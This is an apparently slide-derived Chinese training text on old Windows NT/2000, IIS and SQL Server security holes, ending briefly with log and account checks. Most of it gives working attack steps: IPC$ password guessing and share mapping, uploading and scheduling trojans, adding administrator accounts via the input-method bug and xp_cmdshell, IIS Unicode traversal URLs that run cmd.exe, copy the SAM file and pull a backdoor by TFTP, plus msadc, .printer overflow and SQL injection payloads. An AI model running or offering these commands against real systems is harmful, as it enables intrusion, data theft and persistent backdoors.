1、一、漏洞一、漏洞形成形成后门后门:大型软件、系统的编写,是许多程序员共同完成。他们是将一个软件或系统分成若干板块,分工编写,然后再汇总,测试。最后,修补,发布。在软件汇总时,为了测试方便,程序员总会留有后门;在测试以后再进行修补这些后门,如果一旦疏忽(或是为某种目的故意留下),或是没有发现,软件发布后自然而然就成了漏洞。程序若干板块之间的空隙:程序若干板块之间的空隙:这里很容易出现连程序员的都没想到的漏洞!网络协议:网络协议:网络协议有TCP、UDP、ICMP、IGMP等。其实,他们本来的用途是好的,但却被别人用于不乏的活动:例如,ICMP本来是用于寻找网络相关信息,后来却被用于网络嗅探和攻击
2、;TCP本来是用于网络传输,后来却被用于泄漏用户信息。程序员自身的素质:程序员自身的素质:程序员的自身对网络安全认识的不够,写出的程序自身就有漏洞。操作系统的漏洞操作系统的漏洞弱口令就是用户的操作密码过于简单(如123)。描述:本漏洞的危害性极强,它可以对系统服务器作任何的操作。主要是因为管理员的安全意识不足。测试目的:用本漏洞控制服务器系统。(1)我们可以用爆力破解工具或扫描器(XSCAN等)对机器进行扫描,可得到管理员密码。只要拥有管理员级权限,就能完全共享应用对方的机器,如下面的命令会将对方的C盘映射为自己的X盘:c:net use x:目标主机的IP地址c$密码/user:用户名其中c
3、$为系统默认共享,依此类推,同样可以共享对方的d$,e$(2)运行AT命令。C:net start scheduleSchedule 正在启动服务.Schedulw 服务启动成功。AT的语法:AT computername time command比如:AT computername time runnc.bat(3)用远程控制终端描述:输入法漏洞可以说是中文Windows2000推出后的第一个致命漏洞,通过它我们可以做许多的事情,包括建立用户.测试1:使用文件类型编辑创建管理员用户:1.开机到登陆界面调出输入法,如全拼-帮助-操作指南,跳出输入法指南帮助文件 2.右击选项按钮,选择跳至url
4、 3.在跳至URL上添上c:,其它的也可.4.帮助的右边会进入c:5.按帮助上的选项按钮.6.选internet选项.会启动文件类型编辑框.7.新建一个文件类型,如一个you文件类型,在跳出的文件后缀中添上you.确定.8.选中文件类型框中的you文件类型,点击下面的高级按钮,会出现文件操作对话框.9.新建一种文件操作,操作名任意写,如ppp 10.该操作执行的命令如下:C:WINNTsystem32cmd.exe/cnetusermayi123456/add&C:WINNTsystem32cmd.exe/cnetlocalgroupadministrators aboutnt/add 完成后
5、退出11.将c:的某个文件如pipi.txt改为pipi.txt.mayi,然后双击打开这个文件.12.通常这个文件是打不开的,系统运行一会便没有了提示,但这时我们已经将用户mayi加上了,权限是管理员.13.返回,重新以aboutnt用户登录即可。描述:描述:危害性大,主要是和其它漏洞一块使用IPC$(Inter-Process Communication)共享是NT计算机上的一个标准的隐含共享,它是用于服务器之间的通信的。NT计算机通过使用这个共享来和其他的计算机连接得到不同类型的信息的。常常可利用这一点来,通过使用空的IPC会话进行攻击。测试测试1:通过本漏洞猜测用户密码c:net us
6、e 目标机器的IP地址ipc$/user:当这个连接建立后,要将username和password送去加以确认。如果你以Administrator登录,则需要进行口令猜测。可以重复使用net命令,进行username和password猜测:c:net use xxx.xxx.xxx.xxxipc$/user:也可以使用脚本语句:open(IPC,net use xxx.xxx.xxx.xxxipc$/user:);看看目标计算机上有那些共享的资源可以用下面命令:c:net view 目标计算机的IP地址 一旦IPC$共享顺利完成,下一个命令是:c:net use g:xxx.xxx.xxx.x
7、xxc$得到了C$共享,并将该目录映射到g:,键入:c:dir g:/p 就能显示这个目录的所有内容。测试测试 2:通过测试1来上传木马控制服务器c:net use 202.1.1.1ipc$”/user:”admin”此时,cmd会提示命令成功完成。这样你就和202.1.1.1建立了IPC连接。c:copy server.exe 202.1.1.1admin$上传server.exe到202.1.1.1的winnt目录,因为winnt目录里的东西比较多,管理员不容易发现,所以我们把server.exe上传到里面。Server.exe是janker写的winshell生成的程序,WinShel
8、l是一个运行在Windows平台上的Telnet服务器软件。c:net time 202.1.1.1这个命令可以的到202.1.1.1的系统时间,例如是00:00c:at 202.1.1.1 00:01”server.exe”cmd会提示新加了一项任务,其作业ID为1,这样远程系统会在00:01时运行server.exe。c:at 202.1.1.1 1这样可以查看ID为1的作业情况。c:net use 202.1.1.1ipc$/delete退出IPC连接。现在,server.exe已经在远程主机上运行了。输入:c:telnet 202.1.1.1 21(端口可以自己在winshell中设定
9、)这样就成功的telnet到202.1.1.1上了。应用平台的漏洞应用平台的漏洞 SQL SERVER存在的一些安全漏洞:存在的一些安全漏洞:“SA”帐号弱口令帐号弱口令 描述:危害性极强,它可以完作控制系统服务器。存在“sa”帐户,密码就为空,或密码过于简单,我们就可以通过扫描工具(如X-SCAN等)得到密码,用测试:通过XP-CMDSHEll来增加一个帐号如:Xp_cmdshell net user testuser/ADD 然后在:Xp_cmdshell net localgroup Administrators testuser/ADD 这样攻击者就成功的在SQL SERVER上增加了
10、一个用户。当然远程的话,一般需要有1433口开着,通过MSSQL 客户端进行连接。最后你可以用添加的用户名通过远程控制终端来控制你服务器系统。扩展存储过程参数解析漏洞:扩展存储过程参数解析漏洞:描述:危害性极强,它可以完作控制系统服务器。起主要问题是在MSD中提供一个API函数srv_paraminfo(),它是用来扩展存储过程调用时解释深入参数的,如:exec ,.如要查询“c:winnt”的目录树,可以如下表达:exec xp_dirtree c:winnt但没有检查各个参数的长度,传递相当长的字符串,就存在了覆盖其他堆栈参数的可能导致缓冲溢出。目前已知受影响的扩展存储过程如下:xp_pr
11、intstatements(xprepl.dll)xp_proxiedmetadata(xprepl.dll)xp_SetSQLSecurity(xpstar.dll)关于关于openrowset和和opendatasource 描述:危害性极强,它可以完作控制系统服务器。利用openrowset发送本地命令,通常我们的用法是(包括MSDN的列子)如下 select*fromopenrowset(sqloledb,myserver;sa;,select*fromtable)可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问,它必须跟在select后面,也就是说需要返
12、回一个recordset 那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!select*fromopenrowset(sqloledb,server;sa;,setfmtonlyoffexecmaster.dbo.xp_cmdshelldirc:)必须加上setfmtonlyoff用来屏蔽默认的只返回列信息的设置,这样xp_cmdshell返回的output集合就会提交给前面的select显示,如果采用 默认设置,会返回空集合导致select出错,命令也就无法执行了。那么如果我们要调用sp_addlogin呢,他不会像xp_cmdshell返回任何集合的,我们就不能再依靠fmt
13、only设置了,可以如下操作 select*fromopenrowset(sqloledb,server;sa;,selectOK!execmaster.dbo.sp_addloginHectic)这样,命令至少会返回selectOK!的集合,你的机器商会显示OK!,同时对方的数据库内也会增加一个Hectic的账号,也就是说,我们利用 selectOK!的返回集合欺骗了本地的select请求,是命令能够正常执行,通理sp_addsrvrolemember和opendatasource也可以如此操作!IIS漏洞漏洞 IIS unicode漏洞漏洞 描述:危害性极强,可以完全的控制服务器。对于II
14、S 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如“%c1%hh”或者“%c0%hh”,它会首先将其解码变成:0 xc10 xhh,然后尝试打开这个文件,Windows 系统认为0 xc10 xhh可能是unicode编码,因此它会首先将其解码,如果 0 x00=%hh (0 xc1-0 xc0)*0 x40+0 xhh%c0%hh-(0 xc0-0 xc0)*0 x40+0 xhh例如,在Windows 2000 简体中文版+IIS 5.0+SP1系统下测试:target/A.ida/%c1%00.idaIIS会报告说.ida 文件找不到这里:(0 xc1-0
15、 xc0)*0 x40+0 x00=0 x40=target/A.ida/%c1%01.idaIIS会报告说 A.ida 文件找不到这里:(0 xc1-0 xc0)*0 x40+0 x01=0 x41=A攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。测试 1:下面的URL可能列出当前目录的内容:victim/scripts/.%c1%1c.%c1%1c.%c1%1c.%c1%1c./winnt/system32/cmd.exe?/c+dir测试2:利用这个漏洞查看系统文件内容也是可能的:victim/a.asp/.%c1%1c./.%c1%1c./winnt/win.
16、ini测试 3:删除空的文件夹命令:x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+rd+c:snowspider 测试 4:删除文件的命令:x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+del+c:autoexec.bak测试 5:Copy文件 xxx.xxx.xxx.xxx/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy%20c:winntrepairsam._%20c:inetpubwwwroot 测试 5:用木马(用TFTP、NC
17、X99)在地址栏里填入:202.100.100.1/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+tftp-i?.?.?.?GET ncx99.exe c:inetpubscriptssr.exe?.?.?.?为你自己的IP,注意:c:inetpubscriptssr.exe 其中c:inetpubscripts为主机服务器目录,要看主机的具体情况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。然后等待.大概3分钟.IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:inetpubscripts目录了,您可以自
18、己检查一下。再使用如下调用来执行ncx99.exe(sr.exe)202.100.100.1/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+c:inetpubscriptssr.exe然后您就可以 telnet 202.100.100.1 99 printer远程缓存溢出漏洞远程缓存溢出漏洞缓存溢出:缓存溢出又称为缓冲溢出,缓冲区指一个程序的记忆范围(领域),该领域是用来储存一些数据,如电脑程序信息,中间计算结果,或者输入参数。把数据调入缓冲区之前,程序应该验证缓冲区有足够的长度以容纳所有这些调入的数据。否则,数据将溢出缓冲区并覆写在邻近的数据上,当它运
19、行时,就如同改写了程序。假如溢出的数据是随意的,那它就不是有效的程序代码,当它试图执行这些随意数据时,程序就会失败。另一方面,假如数据是有效的程序代码,程序将会按照数据提供者所设定的要求执行代码和新的功能。描述:漏洞的活动范围是:这是一个缓存溢出漏洞,这漏洞比以往的普通溢出存在更大的危害,主要有两方面的原因:*在缺省安全的情况下,该漏洞可以被来自网络的利用。*可以完全获得和控制存在该漏洞的网站服务器。一旦溢出成功,他可以做他想做的一些事情,包括:安装和运行程序,重新配置服务,增加、改变或者删除文件和网页的内容等等。漏洞的起因是:WIN2K在网络打印ISAPI扩展上缺少足够的缓冲区检查,当一个发
20、出特殊的请求服务时产生缓存溢出,可以让在本地系统执行任意代码。测试:通过IIS5HACK工具来检用信息iis5hack someip 80 3iis5 remote.printer overflow.writen by sunxsunx.orgfor test only,dont used to hack,:pconnecting.sending.Now you can telnet to 99 portgood luck:)c:telnet 63.110.130.66 99Microsoft Windows 2000 Version 5.00.2195(C)Copyright 1985-20
21、00 Microsoft Corp.C:WINNTsystem32已经进入目标主机,你想干什么就是你的事啦。IIS Index Server(.ida/idq)ISAPI扩展远程溢出漏洞扩展远程溢出漏洞描述:危害性极强,它可以完作控制系统服务器。微软IIS缺省安装情况下带了一个索引服务器(Index Server,在Windows 2000下名为Index Service).缺省安装时,IIS支持两种脚本映射:管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展-idq.dll来处理和解释。由于idq.dll在处理某些URL请求时存在一个未经检
22、查的缓冲区,如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发送数据,攻击者可以改变程序执行流程,执行任意代码。成功地利用这个漏洞,攻击者可以远程获取Local System权限。测试:来控制服务器。运行IDQGUI程序,出现一个窗口,填好要入侵的主机IP,选取所对应的系统SP补丁栏,其他设置不改,取默认。然后按右下角的IDQ益出键。如果成功 如图 如果不成功会提示连接错误。连接成功后,我们打开WIN下的DOS状态,输入:NC-VV X.X.X.X 813 如果成功 如图 不成功的话可以在IDQGUI程序里换另一个SP补丁栏试试,如果都不行,就放弃。换其他漏洞机器。4
23、、应用系统漏洞、应用系统漏洞 编程语言漏洞 MDB数据库可下载漏洞数据库可下载漏洞描述:危害性强,可以得到网站的所有内容。数据库中一般存放的是客户的帐号、密码以及网站的中所有内容,如果得到了数据库,也就可以说得到了网站的一功,原理,WEB服务器遇到不能解释的文件是就给下载,测试:在地址栏输入someurl/path/name.mdb,你会发现name.mdb的数据库给下载下来。SQL语句漏洞语句漏洞描述:危害性强,可以进入网站的后台应用程序。假设没有过滤必要的字符:select*fromloginwhereuser=$HTTP_POST_VARSuserandpass=$HTTP_POST_V
24、ARSpass 我们就可以在用户框和密码框输入1or1=1通过验证了。这是非常古董的方法了,这个语句会替换成这样:select*fromloginwhereuser=1or1=1andpass=1or1=1 因为or1=1成立,所以通过了。解决的办法最好就是过滤所有不必要的字符,Jsp代码泄漏漏洞代码泄漏漏洞描述:危害性强,有可能可以查看到数据库帐号密码。在访问JSP页面时,如果在请求URL的.jsp后缀后面加上一或多个.、%2E、+、%2B、%5C、%20、%00,会泄露JSP源代码。测试:查看网页源代码localhost:8080/index.jsp 服务器会正常解释。localhost:
25、8080/index.jsp.只要在后面加上一个.就会导致源代码泄漏(可以通过浏览器的查看源代码看到)。原因:由于Windows在处理文件名时,将index.jsp和index.jsp.认为是同一个文件。CGI漏洞 x.htw or qfullhit.htw or iirturnh.htw描述:危害性强,IIS4.0上有一个应用程序映射htw-webhits.dll,这是用于Index Server的点击功能的。尽管你不运行Index Server,该映射仍然有效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文件,数据库文件,和ASP源代码。一个攻击者可以使用如下的方法来访问系统中文件
26、的内容:victim/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/././winnt/win.ini&cirestriction=none&cihilitetype=full就会在有此漏洞系统中win.ini文件的内容。webhits.dll后接上./便可以访问到Web虚拟目录外的文件,下面我们来看个例子:somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log&CiRest
27、riction=none&CiHiliteType=Full在浏览器中输入该地址,便可以获得该服务器上给定日期的Web日志文件.在系统常见的.htw样本文件有:/iissamples/issamples/oop/qfullhit.htw/iissamples/issamples/oop/qsumrhit.htw/iissamples/exair/search/qfullhit.htw/iissamples/exair/search/qsumrhit.hw/iishelp/iis/misc/iirturnh.htw 这个文件通常受loopback限制利用inetinfo.exe来调用webhit
28、s.dll,这样同样能访问到Web虚拟目录外的文件,这样请求一个.htw文件:url/default.htm.htw?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full这个请求肯定会失败,但请注意,我们现在已经调用到了webhits.dll,我们只要在一个存在的文件资源后面也就是在.htw前面加上一串特殊的数字(%20s),就是在例子中default.htm后面加上这个代表空格的特殊数字,这样我们便可以欺骗过web服务器从而达到我们的目的.由于在缓
29、冲部分中.htw文件名字部分被删除掉由于%20s这个符号,所以,当请求传送到webhits.dll的时候,便可以成功的打开该文件,并返回给客户端,而且过程中并不要求系统中真的存在.htw文件。比如:url/default.htm%20s.htw?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 解决方法:hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,
30、这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:victim/nosuchfile.htw如果你从服务器端获得如下信息:format of the QUERY_STRING is invalid这就表示你存在这个漏洞。这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消这个映射就能避免这个漏洞,你可
31、以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:/iissamples/issamples/oop/qfullhit.htw/iissamples/issamples/oop/qsumrhit.htw/isssamples/exair/search/qfullhit.htw/isssamples/exair/search/qsumrhit.htw/isshelp/iss/misc/iirturnh.htw(这个一般为loopback使用)msadc 描述:IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认
32、情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。测试:结合木马来控制服务器C:PerlBINperl-x msadc2.pl-h 目标机xxx.xxx.xxx.xxx Please type the NT commandline you want to run(cmd/c assumed):ncmd/c 一般这里我用TFTP上传我的木马文件,但首先你得先设置好你的TFTP主机 tftp-i 127.0.0.1 get ntsrv.exe c:winntsystem32ntsrv.exe 这里127.0.0.1 是我的TFTP主机,T
33、FTP目录下有NTSRV。EXE木马 如果程序执行成功,TFTP会显示文件传输的进度,然后再执行PERL,将木马激活,你再用木马连上对方的机器,搞定 2、C:PerlBINperl-x msadc2.pl-h 目标机 cmd/c net user pt007/add 3、C:PerlBINperl-x msadc2.pl-h 目标机 cmd/c net user pt007 ptlove 4、C:PerlBINperl-x msadc2.pl-h 目标机 cmd/c net localgroup administrators pt007/add 5、C:PerlBINperl-x msadc2
34、.pl-h 目标机 cmd/c c:winntsystem32ncx99.exe uploader.exe 描述:本漏洞的危害性强,如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。测试:上传一个木马在地址栏输入:host/cgi-win/uploader.exe 会带你到上传页面 打对应的补丁是最好的解决办法,可以到微软下载中心microsoft/downloads/search.asp下载所需的补丁。另注意以后要不断下载升级补丁。IIS LOCK TOOLS1、日志的检测、日志的检测(1)日志的分类)日志的分类l 操作系统l 安全日志l
35、 应用程序日志l 系统日志l 应用系统l 其它 安全性日志安全性日志 安全性基本上捕获那些成功和失败审核事件,同时对这种事性的概述很简单。如下图4、检查用户帐号和组信息、检查用户帐号和组信息 启动用户管理器程序,或者在命令行状态下执行net user、net group和net localgroup命令,查看当前用户和组清单,确保内置GUEST帐号被禁止使用:看看是否有非法组成员存在。默认安装后的组都具有特殊权限,例如,Administrators组成员有权对本地系统做任何事情,Backup operators组成员有权读取系统中的所有文件,PowerUsers组成员有权创建共享。不要让一些不合适的用户隐藏在这些组中。要从窗口界面检查系统中都共享了哪些资源,是件很烦琐的事情,很可能造成遗漏。执行命令行程序net share是个简便的方法,它可以很快很完整地显示出系统中的所有共享资源
